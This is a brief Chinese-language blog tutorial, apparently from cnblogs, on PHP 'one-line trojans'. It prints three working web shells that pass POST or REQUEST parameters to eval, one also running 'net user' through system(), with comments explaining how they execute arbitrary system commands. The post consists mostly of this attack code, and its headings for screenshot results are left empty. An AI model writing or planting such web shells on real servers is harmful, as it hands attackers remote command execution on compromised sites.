标签:div ima strong nbsp com mamicode echo 输入 技术
一:
关于PHP的一句话木马:
1 <?php
2
3 $a=$_POST[‘H‘];
4 eval("$a");//eval会将输入的$a作为php语句执行,因此只要对_赋一定的system命令值,就能够执行系统命令
5
6 ?>
显示结果:
关于PHP的一句话木马:
1 <?php
2 $string=@$_POST["_"];
3 var_dump($string);
4
5 echo "<br>";
6 eval("system(‘net user‘);");
7
8 ?>
当POST参数_的值为空时:
当不为空时:
使用REQUEST方法:
1 <?php
2
3 @eval($_REQUEST[_]);//什么类型的,如POST,GET均可以接收
4
5 ?>
显示结果:
GET型:
POST型:
标签:div ima strong nbsp com mamicode echo 输入 技术
原文地址:https://www.cnblogs.com/cute-puli/p/11118230.html
